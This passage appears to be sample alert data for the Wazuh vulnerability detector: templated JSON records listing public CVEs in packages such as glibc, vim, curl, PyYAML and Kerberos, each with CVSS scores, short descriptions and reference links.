2.32.","severity":"Low","published":"2020-04-30","updated":"2020-05-18","state":"Fixed","cwe_reference":"CWE-416","references":["https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2020-1752","https://security.netapp.com/advisory/ntap-20200511-0005/","https://sourceware.org/bugzilla/show_bug.cgi?id=25414","https://sourceware.org/git/gitweb.cgi?p=glibc.git;h=ddc650e9b3dc916eab417ce9f79e67337b05035c","https://nvd.nist.gov/vuln/detail/CVE-2020-1752","http://people.canonical.com/~ubuntu-security/cve/2020/CVE-2020-1752.html","https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1752","https://sourceware.org/git/?p=glibc.git;a=commitdiff;h=263e6175999bc7f5adb8b32fd12fcfae3f0bb05a;hp=37db4539dd8b5c098d9235249c5d2aedaa67d7d1"],"assigner":"cve@mitre.org","cve_version":"4.0"}},"location":"vulnerability-detector"} +{"timestamp":"{timestamp}","rule":{"level":5,"description":"CVE-2020-1752 affects multiarch-support","id":"23503","firedtimes":17,"mail":false,"groups":["vulnerability-detector"],"gdpr":["IV_35.7.d"],"pci_dss":["11.2.1","11.2.3"],"tsc":["CC7.1","CC7.2"]},"agent":{"id":"002","name":"Amazon","ip":"145.80.240.15"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{"name":"json"},"data":{"vulnerability":{"package":{"name":"multiarch-support","source":"glibc","version":"2.27-3ubuntu1","architecture":"amd64","condition":"Package less than 2.32.0"},"cvss":{"cvss2":{"vector":{"attack_vector":"local","access_complexity":"high","authentication":"none","confidentiality_impact":"partial","integrity_impact":"partial","availability":"partial"},"base_score":"3.700000"}},"cve":"CVE-2020-1752","title":"CVE-2020-1752 on Ubuntu 18.04 LTS (bionic) - medium.","rationale":"A use-after-free vulnerability introduced in glibc upstream version 2.14 was found in the way the tilde expansion was carried out. Directory paths containing an initial tilde followed by a valid username were affected by this issue. A local attacker could exploit this flaw by creating a specially crafted path that, when processed by the glob function, would potentially lead to arbitrary code execution. This was fixed in version 2.32.","severity":"Low","published":"2020-04-30","updated":"2020-05-18","state":"Fixed","cwe_reference":"CWE-416","references":["https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2020-1752","https://security.netapp.com/advisory/ntap-20200511-0005/","https://sourceware.org/bugzilla/show_bug.cgi?id=25414","https://sourceware.org/git/gitweb.cgi?p=glibc.git;h=ddc650e9b3dc916eab417ce9f79e67337b05035c","https://nvd.nist.gov/vuln/detail/CVE-2020-1752","http://people.canonical.com/~ubuntu-security/cve/2020/CVE-2020-1752.html","https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1752","https://sourceware.org/git/?p=glibc.git;a=commitdiff;h=263e6175999bc7f5adb8b32fd12fcfae3f0bb05a;hp=37db4539dd8b5c098d9235249c5d2aedaa67d7d1"],"assigner":"cve@mitre.org","cve_version":"4.0"}},"location":"vulnerability-detector"} +{"timestamp":"{timestamp}","rule":{"level":10,"description":"CVE-2019-20079 affects vim","id":"23505","firedtimes":109,"mail":false,"groups":["vulnerability-detector"],"gdpr":["IV_35.7.d"],"pci_dss":["11.2.1","11.2.3"],"tsc":["CC7.1","CC7.2"]},"agent":{"id":"002","name":"Amazon","ip":"145.80.240.15"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{"name":"json"},"data":{"vulnerability":{"package":{"name":"vim","version":"2:7.4.1689-3ubuntu1.4","architecture":"amd64","condition":"Package less than 8.1.2136"},"cvss":{"cvss2":{"vector":{"attack_vector":"network","access_complexity":"low","authentication":"none","confidentiality_impact":"partial","integrity_impact":"partial","availability":"partial"},"base_score":"7.500000"}},"cve":"CVE-2019-20079","title":"The autocmd feature in window.c in Vim before 8.1.2136 accesses freed memory.","severity":"High","published":"2019-12-30","updated":"2020-03-30","state":"Fixed","cwe_reference":"CWE-416","references":["https://github.com/vim/vim/commit/ec66c41d84e574baf8009dbc0bd088d2bc5b2421","https://github.com/vim/vim/compare/v8.1.2135...v8.1.2136","https://packetstormsecurity.com/files/154898","https://usn.ubuntu.com/4309-1/","https://nvd.nist.gov/vuln/detail/CVE-2019-20079"],"assigner":"cve@mitre.org","cve_version":"4.0"}},"location":"vulnerability-detector"} +{"timestamp":"{timestamp}","rule":{"level":10,"description":"CVE-2018-1000035 affects unzip","id":"23505","firedtimes":1,"mail":false,"groups":["vulnerability-detector"],"gdpr":["IV_35.7.d"],"pci_dss":["11.2.1","11.2.3"],"tsc":["CC7.1","CC7.2"]},"agent":{"id":"004","name":"Ubuntu","ip":"47.204.15.21"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{"name":"json"},"data":{"vulnerability":{"package":{"name":"unzip","version":"6.0-21ubuntu1","architecture":"amd64","condition":"Package less or equal than 6.00"},"cvss":{"cvss2":{"vector":{"attack_vector":"network","access_complexity":"medium","authentication":"none","confidentiality_impact":"partial","integrity_impact":"partial","availability":"partial"},"base_score":"6.800000"},"cvss3":{"vector":{"attack_vector":"local","access_complexity":"low","privileges_required":"none","user_interaction":"required","scope":"unchanged","confidentiality_impact":"high","integrity_impact":"high","availability":"high"},"base_score":"7.800000"}},"cve":"CVE-2018-1000035","title":"CVE-2018-1000035 on Ubuntu 18.04 LTS (bionic) - low.","rationale":"A heap-based buffer overflow exists in Info-Zip UnZip version <= 6.00 in the processing of password-protected archives that allows an attacker to perform a denial of service or to possibly achieve code execution.","severity":"High","published":"2018-02-09","updated":"2020-01-29","state":"Fixed","cwe_reference":"CWE-119","bugzilla_references":["http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=889838"],"references":["https://lists.debian.org/debian-lts-announce/2020/01/msg00026.html","https://sec-consult.com/en/blog/advisories/multiple-vulnerabilities-in-infozip-unzip/index.html","https://security.gentoo.org/glsa/202003-58","https://nvd.nist.gov/vuln/detail/CVE-2018-1000035","http://people.canonical.com/~ubuntu-security/cve/2018/CVE-2018-1000035.html","https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1000035","https://www.sec-consult.com/en/blog/advisories/multiple-vulnerabilities-in-infozip-unzip/index.html"],"assigner":"cve@mitre.org","cve_version":"4.0"}},"location":"vulnerability-detector"} +{"timestamp":"{timestamp}","rule":{"level":7,"description":"CVE-2017-9502 affects curl","id":"23504","firedtimes":334,"mail":false,"groups":["vulnerability-detector"],"gdpr":["IV_35.7.d"],"pci_dss":["11.2.1","11.2.3"],"tsc":["CC7.1","CC7.2"]},"agent":{"id":"007","name":"Debian","ip":"24.273.97.14"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{"name":"json"},"data":{"vulnerability":{"package":{"name":"curl","version":"7.47.0-1ubuntu2.14","architecture":"amd64","condition":"Package less or equal than 7.54.0"},"cvss":{"cvss2":{"vector":{"attack_vector":"network","access_complexity":"low","authentication":"none","confidentiality_impact":"none","integrity_impact":"none","availability":"partial"},"base_score":"5"},"cvss3":{"vector":{"attack_vector":"network","access_complexity":"low","privileges_required":"none","user_interaction":"none","scope":"unchanged","confidentiality_impact":"none","integrity_impact":"none","availability":"low"},"base_score":"5.300000"}},"cve":"CVE-2017-9502","title":"In curl before 7.54.1 on Windows and DOS, libcurl's default protocol function, which is the logic that allows an application to set which protocol libcurl should attempt to use when given a URL without a scheme part, had a flaw that could lead to it overwriting a heap based memory buffer with seven bytes. If the default protocol is specified to be FILE or a file: URL lacks two slashes, the given \"URL\" starts with a drive letter, and libcurl is built for Windows or DOS, then libcurl would copy the path 7 bytes off, so that the end of the given path would write beyond the malloc buffer (7 bytes being the length in bytes of the ascii string \"file://\").","severity":"Medium","published":"2017-06-14","updated":"2017-07-08","state":"Fixed","cwe_reference":"CWE-119","references":["http://openwall.com/lists/oss-security/2017/06/14/1","http://www.securityfocus.com/bid/99120","http://www.securitytracker.com/id/1038697","https://curl.haxx.se/docs/adv_20170614.html","https://nvd.nist.gov/vuln/detail/CVE-2017-9502"],"assigner":"cve@mitre.org","cve_version":"4.0"}},"location":"vulnerability-detector"} +{"timestamp":"{timestamp}","rule":{"level":13,"description":"CVE-2017-12588 affects rsyslog","id":"23506","firedtimes":64,"mail":false,"groups":["vulnerability-detector"],"gdpr":["IV_35.7.d"],"pci_dss":["11.2.1","11.2.3"],"tsc":["CC7.1","CC7.2"]},"agent":{"id":"004","name":"Ubuntu","ip":"47.204.15.21"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{"name":"json"},"data":{"vulnerability":{"package":{"name":"rsyslog","version":"8.16.0-1ubuntu3.1","architecture":"amd64","condition":"Package less or equal than 8.27.0"},"cvss":{"cvss2":{"vector":{"attack_vector":"network","access_complexity":"low","authentication":"none","confidentiality_impact":"partial","integrity_impact":"partial","availability":"partial"},"base_score":"7.500000"},"cvss3":{"vector":{"attack_vector":"network","access_complexity":"low","privileges_required":"none","user_interaction":"none","scope":"unchanged","confidentiality_impact":"high","integrity_impact":"high","availability":"high"},"base_score":"9.800000"}},"cve":"CVE-2017-12588","title":"The zmq3 input and output modules in rsyslog before 8.28.0 interpreted description fields as format strings, possibly allowing a format string attack with unspecified impact.","severity":"Critical","published":"2017-08-06","updated":"2017-08-14","state":"Fixed","cwe_reference":"CWE-134","references":["https://github.com/rsyslog/rsyslog/blob/master/ChangeLog","https://github.com/rsyslog/rsyslog/commit/062d0c671a29f7c6f7dff4a2f1f35df375bbb30b","https://github.com/rsyslog/rsyslog/pull/1565","https://nvd.nist.gov/vuln/detail/CVE-2017-12588"],"assigner":"cve@mitre.org","cve_version":"4.0"}},"location":"vulnerability-detector"} +{"timestamp":"{timestamp}","rule":{"level":7,"description":"CVE-2019-17540 affects libmagickcore-6.q16-3","id":"23504","firedtimes":5,"mail":false,"groups":["vulnerability-detector"],"gdpr":["IV_35.7.d"],"pci_dss":["11.2.1","11.2.3"],"tsc":["CC7.1","CC7.2"]},"agent":{"id":"003","name":"ip-10-0-0-180.us-west-1.compute.internal","ip":"10.0.0.180"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{"name":"json"},"data":{"vulnerability":{"package":{"name":"libmagickcore-6.q16-3","source":"imagemagick","version":"8:6.9.7.4+dfsg-16ubuntu6.8","architecture":"amd64","condition":"Package less than 7.0.8-54"},"cvss":{"cvss2":{"vector":{"attack_vector":"network","access_complexity":"medium","authentication":"none","confidentiality_impact":"partial","integrity_impact":"partial","availability":"partial"},"base_score":"6.800000"}},"cve":"CVE-2019-17540","title":"ImageMagick before 7.0.8-54 has a heap-based buffer overflow in ReadPSInfo in coders/ps.c.","severity":"Medium","published":"2019-10-14","updated":"2019-10-23","state":"Fixed","cwe_reference":"CWE-120","references":["https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=15826","https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=942578","https://github.com/ImageMagick/ImageMagick/compare/7.0.8-53...7.0.8-54","https://github.com/ImageMagick/ImageMagick/compare/master@%7B2019-07-15%7D...master@%7B2019-07-17%7D","https://security-tracker.debian.org/tracker/CVE-2019-17540","https://nvd.nist.gov/vuln/detail/CVE-2019-17540"],"assigner":"cve@mitre.org","cve_version":"4.0"}},"location":"vulnerability-detector"} +{"timestamp":"{timestamp}","rule":{"level":7,"description":"CVE-2019-11727 affects thunderbird","id":"23504","firedtimes":312,"mail":false,"groups":["vulnerability-detector"],"gdpr":["IV_35.7.d"],"pci_dss":["11.2.1","11.2.3"],"tsc":["CC7.1","CC7.2"]},"agent":{"id":"001","name":"RHEL7","ip":"187.54.247.68"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{"name":"json"},"data":{"vulnerability":{"package":{"name":"thunderbird","version":"1:68.8.0+build2-0ubuntu0.16.04.2","architecture":"amd64","condition":"Package unfixed"},"cvss":{"cvss2":{"vector":{"attack_vector":"network","access_complexity":"low","authentication":"none","confidentiality_impact":"none","integrity_impact":"partial","availability":"none"},"base_score":"5"},"cvss3":{"vector":{"attack_vector":"network","access_complexity":"low","privileges_required":"none","user_interaction":"none","scope":"unchanged","confidentiality_impact":"none","integrity_impact":"low","availability":"none"},"base_score":"5.300000"}},"cve":"CVE-2019-11727","title":"CVE-2019-11727 on Ubuntu 16.04 LTS (xenial) - medium.","rationale":"A vulnerability exists where it possible to force Network Security Services (NSS) to sign CertificateVerify with PKCS#1 v1.5 signatures when those are the only ones advertised by server in CertificateRequest in TLS 1.3. PKCS#1 v1.5 signatures should not be used for TLS 1.3 messages. This vulnerability affects Firefox < 68.","severity":"Medium","published":"2019-07-23","updated":"2019-07-30","state":"Unfixed","cwe_reference":"CWE-295","bugzilla_references":["https://bugzilla.mozilla.org/show_bug.cgi?id=1552208"],"references":["http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00009.html","http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00010.html","http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00011.html","http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00017.html","http://lists.opensuse.org/opensuse-security-announce/2020-01/msg00006.html","https://access.redhat.com/errata/RHSA-2019:1951","https://bugzilla.mozilla.org/show_bug.cgi?id=1552208","https://security.gentoo.org/glsa/201908-12","https://www.mozilla.org/security/advisories/mfsa2019-21/","https://nvd.nist.gov/vuln/detail/CVE-2019-11727","http://people.canonical.com/~ubuntu-security/cve/2019/CVE-2019-11727.html","https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11727","https://usn.ubuntu.com/usn/usn-4054-1","https://usn.ubuntu.com/usn/usn-4060-1","https://www.mozilla.org/en-US/security/advisories/mfsa2019-21/#CVE-2019-11727"],"assigner":"cve@mitre.org","cve_version":"4.0"}},"location":"vulnerability-detector"} +{"timestamp":"{timestamp}","rule":{"level":13,"description":"CVE-2017-18342 affects python3-yaml","id":"23506","firedtimes":65,"mail":false,"groups":["vulnerability-detector"],"gdpr":["IV_35.7.d"],"pci_dss":["11.2.1","11.2.3"],"tsc":["CC7.1","CC7.2"]},"agent":{"id":"002","name":"Amazon","ip":"145.80.240.15"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{"name":"json"},"data":{"vulnerability":{"package":{"name":"python3-yaml","source":"pyyaml","version":"3.11-3build1","architecture":"amd64","condition":"Package unfixed"},"cvss":{"cvss2":{"vector":{"attack_vector":"network","access_complexity":"low","authentication":"none","confidentiality_impact":"partial","integrity_impact":"partial","availability":"partial"},"base_score":"7.500000"},"cvss3":{"vector":{"attack_vector":"network","access_complexity":"low","privileges_required":"none","user_interaction":"none","scope":"unchanged","confidentiality_impact":"high","integrity_impact":"high","availability":"high"},"base_score":"9.800000"}},"cve":"CVE-2017-18342","title":"CVE-2017-18342 on Ubuntu 16.04 LTS (xenial) - low.","rationale":"In PyYAML before 5.1, the yaml.load() API could execute arbitrary code if used with untrusted data. The load() function has been deprecated in version 5.1 and the 'UnsafeLoader' has been introduced for backward compatibility with the function.","severity":"Critical","published":"2018-06-27","updated":"2019-06-24","state":"Unfixed","cwe_reference":"CWE-20","bugzilla_references":["http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=902878"],"references":["https://github.com/marshmallow-code/apispec/issues/278","https://github.com/yaml/pyyaml/blob/master/CHANGES","https://github.com/yaml/pyyaml/issues/193","https://github.com/yaml/pyyaml/pull/74","https://github.com/yaml/pyyaml/wiki/PyYAML-yaml.load(input)-Deprecation","https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JEX7IPV5P2QJITAMA5Z63GQCZA5I6NVZ/","https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KSQQMRUQSXBSUXLCRD3TSZYQ7SEZRKCE/","https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/M6JCFGEIEOFMWWIXGHSELMKQDD4CV2BA/","https://security.gentoo.org/glsa/202003-45","https://nvd.nist.gov/vuln/detail/CVE-2017-18342","http://people.canonical.com/~ubuntu-security/cve/2017/CVE-2017-18342.html","https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18342"],"assigner":"cve@mitre.org","cve_version":"4.0"}},"location":"vulnerability-detector"} +{"timestamp":"{timestamp}","rule":{"level":10,"description":"CVE-2019-13050 affects gnupg","id":"23505","firedtimes":114,"mail":false,"groups":["vulnerability-detector"],"gdpr":["IV_35.7.d"],"pci_dss":["11.2.1","11.2.3"],"tsc":["CC7.1","CC7.2"]},"agent":{"id":"003","name":"ip-10-0-0-180.us-west-1.compute.internal","ip":"10.0.0.180"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{"name":"json"},"data":{"vulnerability":{"package":{"name":"gnupg","version":"1.4.20-1ubuntu3.3","architecture":"amd64","condition":"Package less or equal than 2.2.16"},"cvss":{"cvss2":{"vector":{"attack_vector":"network","access_complexity":"low","authentication":"none","confidentiality_impact":"none","integrity_impact":"none","availability":"partial"},"base_score":"5"},"cvss3":{"vector":{"attack_vector":"network","access_complexity":"low","privileges_required":"none","user_interaction":"none","scope":"unchanged","confidentiality_impact":"none","integrity_impact":"none","availability":"high"},"base_score":"7.500000"}},"cve":"CVE-2019-13050","title":"CVE-2019-13050 on Ubuntu 16.04 LTS (xenial) - low.","rationale":"Interaction between the sks-keyserver code through 1.2.0 of the SKS keyserver network, and GnuPG through 2.2.16, makes it risky to have a GnuPG keyserver configuration line referring to a host on the SKS keyserver network. Retrieving data from this network may cause a persistent denial of service, because of a Certificate Spamming Attack.","severity":"High","published":"2019-06-29","updated":"2019-07-09","state":"Fixed","cwe_reference":"CWE-297","bugzilla_references":["https://bugs.launchpad.net/bugs/1844059","https://bugzilla.suse.com/show_bug.cgi?id=CVE-2019-13050","https://dev.gnupg.org/T4591","https://dev.gnupg.org/T4607","https://dev.gnupg.org/T4628"],"references":["http://lists.opensuse.org/opensuse-security-announce/2019-08/msg00039.html","https://gist.github.com/rjhansen/67ab921ffb4084c865b3618d6955275f","https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/AUK2YRO6QIH64WP2LRA5D4LACTXQPPU4/","https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/CP4ON34YEXEZDZOXXWV43KVGGO6WZLJ5/","https://lists.gnupg.org/pipermail/gnupg-announce/2019q3/000439.html","https://support.f5.com/csp/article/K08654551","https://support.f5.com/csp/article/K08654551?utm_source=f5support&utm_medium=RSS","https://twitter.com/lambdafu/status/1147162583969009664","https://nvd.nist.gov/vuln/detail/CVE-2019-13050","http://people.canonical.com/~ubuntu-security/cve/2019/CVE-2019-13050.html","https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13050"],"assigner":"cve@mitre.org","cve_version":"4.0"}},"location":"vulnerability-detector"} +{"timestamp":"{timestamp}","rule":{"level":5,"description":"CVE-2015-2987 affects ed","id":"23503","firedtimes":9,"mail":false,"groups":["vulnerability-detector"],"gdpr":["IV_35.7.d"],"pci_dss":["11.2.1","11.2.3"],"tsc":["CC7.1","CC7.2"]},"agent":{"id":"001","name":"RHEL7","ip":"187.54.247.68"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{"name":"json"},"data":{"vulnerability":{"package":{"name":"ed","version":"1.10-2.1","architecture":"amd64","condition":"Package less or equal than 3.4"},"cvss":{"cvss2":{"vector":{"attack_vector":"network","access_complexity":"high","authentication":"none","confidentiality_impact":"partial","integrity_impact":"none","availability":"none"},"base_score":"2.600000"}},"cve":"CVE-2015-2987","title":"Type74 ED before 4.0 misuses 128-bit ECB encryption for small files, which makes it easier for attackers to obtain plaintext data via differential cryptanalysis of a file with an original length smaller than 128 bits.","severity":"Low","published":"2015-08-28","updated":"2015-08-31","state":"Fixed","cwe_reference":"CWE-17","references":["http://jvn.jp/en/jp/JVN91474878/index.html","http://jvndb.jvn.jp/jvndb/JVNDB-2015-000119","http://type74.org/edman5-1.php","http://type74org.blog14.fc2.com/blog-entry-1384.html","https://nvd.nist.gov/vuln/detail/CVE-2015-2987"],"assigner":"cve@mitre.org","cve_version":"4.0"}},"location":"vulnerability-detector"} +{"timestamp":"{timestamp}","rule":{"level":7,"description":"CVE-2020-1927 affects apache2-utils","id":"23504","firedtimes":193,"mail":false,"groups":["vulnerability-detector"],"gdpr":["IV_35.7.d"],"pci_dss":["11.2.1","11.2.3"],"tsc":["CC7.1","CC7.2"]},"agent":{"id":"004","name":"Ubuntu","ip":"47.204.15.21"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{"name":"json"},"data":{"vulnerability":{"package":{"name":"apache2-utils","source":"apache2","version":"2.4.29-1ubuntu4.13","architecture":"amd64","condition":"Package unfixed"},"cvss":{"cvss2":{"vector":{"attack_vector":"network","access_complexity":"medium","authentication":"none","confidentiality_impact":"partial","integrity_impact":"partial","availability":"none"},"base_score":"5.800000"}},"cve":"CVE-2020-1927","title":"CVE-2020-1927 on Ubuntu 18.04 LTS (bionic) - low.","rationale":"In Apache HTTP Server 2.4.0 to 2.4.41, redirects configured with mod_rewrite that were intended to be self-referential might be fooled by encoded newlines and redirect instead to an an unexpected URL within the request URL.","severity":"Medium","published":"2020-04-02","updated":"2020-04-03","state":"Unfixed","cwe_reference":"CWE-601","references":["http://lists.opensuse.org/opensuse-security-announce/2020-05/msg00002.html","http://www.openwall.com/lists/oss-security/2020/04/03/1","http://www.openwall.com/lists/oss-security/2020/04/04/1","https://httpd.apache.org/security/vulnerabilities_24.html","https://lists.apache.org/thread.html/r10b853ea87dd150b0e76fda3f8254dfdb23dd05fa55596405b58478e@%3Ccvs.httpd.apache.org%3E","https://lists.apache.org/thread.html/r1719675306dfbeaceff3dc63ccad3de2d5615919ca3c13276948b9ac@%3Cdev.httpd.apache.org%3E","https://lists.apache.org/thread.html/r52a52fd60a258f5999a8fa5424b30d9fd795885f9ff4828d889cd201@%3Cdev.httpd.apache.org%3E","https://lists.apache.org/thread.html/r70ba652b79ba224b2cbc0a183078b3a49df783b419903e3dcf4d78c7@%3Ccvs.httpd.apache.org%3E","https://security.netapp.com/advisory/ntap-20200413-0002/","https://nvd.nist.gov/vuln/detail/CVE-2020-1927","http://people.canonical.com/~ubuntu-security/cve/2020/CVE-2020-1927.html","https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1927","https://httpd.apache.org/security/vulnerabilities_24.html#CVE-2020-1927"],"assigner":"cve@mitre.org","cve_version":"4.0"}},"location":"vulnerability-detector"} +{"timestamp":"{timestamp}","rule":{"level":13,"description":"CVE-2017-15088 affects krb5-locales","id":"23506","firedtimes":73,"mail":false,"groups":["vulnerability-detector"],"gdpr":["IV_35.7.d"],"pci_dss":["11.2.1","11.2.3"],"tsc":["CC7.1","CC7.2"]},"agent":{"id":"007","name":"Debian","ip":"24.273.97.14"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{"name":"json"},"data":{"vulnerability":{"package":{"name":"krb5-locales","source":"krb5","version":"1.13.2+dfsg-5ubuntu2.1","architecture":"all","condition":"Package unfixed"},"cvss":{"cvss2":{"vector":{"attack_vector":"network","access_complexity":"low","authentication":"none","confidentiality_impact":"partial","integrity_impact":"partial","availability":"partial"},"base_score":"7.500000"},"cvss3":{"vector":{"attack_vector":"network","access_complexity":"low","privileges_required":"none","user_interaction":"none","scope":"unchanged","confidentiality_impact":"high","integrity_impact":"high","availability":"high"},"base_score":"9.800000"}},"cve":"CVE-2017-15088","title":"CVE-2017-15088 on Ubuntu 16.04 LTS (xenial) - negligible.","rationale":"plugins/preauth/pkinit/pkinit_crypto_openssl.c in MIT Kerberos 5 (aka krb5) through 1.15.2 mishandles Distinguished Name (DN) fields, which allows remote attackers to execute arbitrary code or cause a denial of service (buffer overflow and application crash) in situations involving untrusted X.509 data, related to the get_matching_data and X509_NAME_oneline_ex functions. NOTE: this has security relevance only in use cases outside of the MIT Kerberos distribution, e.g., the use of get_matching_data in KDC certauth plugin code that is specific to Red Hat.","severity":"Critical","published":"2017-11-23","updated":"2019-10-09","state":"Unfixed","cwe_reference":"CWE-119","bugzilla_references":["http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=871698"],"references":["http://www.securityfocus.com/bid/101594","https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=871698","https://bugzilla.redhat.com/show_bug.cgi?id=1504045","https://github.com/krb5/krb5/commit/fbb687db1088ddd894d975996e5f6a4252b9a2b4","https://github.com/krb5/krb5/pull/707","https://nvd.nist.gov/vuln/detail/CVE-2017-15088","http://people.canonical.com/~ubuntu-security/cve/2017/CVE-2017-15088.html","https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-15088"],"assigner":"cve@mitre.org","cve_version":"4.0"}},"location":"vulnerability-detector"} +{"timestamp":"{timestamp}","rule":{"level":7,"description":"CVE-2019-17540 affects imagemagick","id":"23504","firedtimes":2,"mail":false,"groups":["vulnerability-detector"],"gdpr":["IV_35.7.d"],"pci_dss":["11.2.1","11.2.3"],"tsc":["CC7.1","CC7.2"]},"agent":{"id":"001","name":"RHEL7","ip":"187.54.247.68"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{"name":"json"},"data":{"vulnerability":{"package":{"name":"imagemagick","version":"8:6.9.7.4+dfsg-16ubuntu6.8","architecture":"amd64","condition":"Package less than 7.0.8-54"},"cvss":{"cvss2":{"vector":{"attack_vector":"network","access_complexity":"medium","authentication":"none","confidentiality_impact":"partial","integrity_impact":"partial","availability":"partial"},"base_score":"6.800000"}},"cve":"CVE-2019-17540","title":"ImageMagick before 7.0.8-54 has a heap-based buffer overflow in ReadPSInfo in coders/ps.c.","severity":"Medium","published":"2019-10-14","updated":"2019-10-23","state":"Fixed","cwe_reference":"CWE-120","references":["https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=15826","https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=942578","https://github.com/ImageMagick/ImageMagick/compare/7.0.8-53...7.0.8-54","https://github.com/ImageMagick/ImageMagick/compare/master@%7B2019-07-15%7D...master@%7B2019-07-17%7D","https://security-tracker.debian.org/tracker/CVE-2019-17540","https://nvd.nist.gov/vuln/detail/CVE-2019-17540"],"assigner":"cve@mitre.org","cve_version":"4.0"}},"location":"vulnerability-detector"} +{"timestamp":"{timestamp}","rule":{"level":7,"description":"CVE-2019-1010204 affects binutils","id":"23504","firedtimes":369,"mail":false,"groups":["vulnerability-detector"],"gdpr":["IV_35.7.d"],"pci_dss":["11.2.1","11.2.3"],"tsc":["CC7.1","CC7.2"]},"agent":{"id":"001","name":"RHEL7","ip":"187.54.247.68"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{"name":"json"},"data":{"vulnerability":{"package":{"name":"binutils","version":"2.26.1-1ubuntu1~16.04.8","architecture":"amd64","condition":"Package greater or equal than 2.21 and less or equal than 2.31.1"},"cvss":{"cvss2":{"vector":{"attack_vector":"network","access_complexity":"medium","authentication":"none","confidentiality_impact":"none","integrity_impact":"none","availability":"partial"},"base_score":"4.300000"},"cvss3":{"vector":{"attack_vector":"local","access_complexity":"low","privileges_required":"none","user_interaction":"required","scope":"unchanged","confidentiality_impact":"none","integrity_impact":"none","availability":"high"},"base_score":"5.500000"}},"cve":"CVE-2019-1010204","title":"CVE-2019-1010204 on Ubuntu 16.04 LTS (xenial) - low.","rationale":"GNU binutils gold gold v1.11-v1.16 (GNU binutils v2.21-v2.31.1) is affected by: Improper Input Validation, Signed/Unsigned Comparison, Out-of-bounds Read. The impact is: Denial of service. The component is: gold/fileread.cc:497, elfcpp/elfcpp_file.h:644. The attack vector is: An ELF file with an invalid e_shoff header field must be opened.","severity":"Medium","published":"2019-07-23","updated":"2019-08-22","state":"Fixed","cwe_reference":"CWE-125","bugzilla_references":["https://sourceware.org/bugzilla/show_bug.cgi?id=23765"],"references":["https://security.netapp.com/advisory/ntap-20190822-0001/","https://sourceware.org/bugzilla/show_bug.cgi?id=23765","https://support.f5.com/csp/article/K05032915?utm_source=f5support&utm_medium=RSS","https://nvd.nist.gov/vuln/detail/CVE-2019-1010204","http://people.canonical.com/~ubuntu-security/cve/2019/CVE-2019-1010204.html","https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1010204"],"assigner":"cve@mitre.org","cve_version":"4.0"}},"location":"vulnerability-detector"} +{"timestamp":"{timestamp}","rule":{"level":5,"description":"CVE-2019-19645 affects 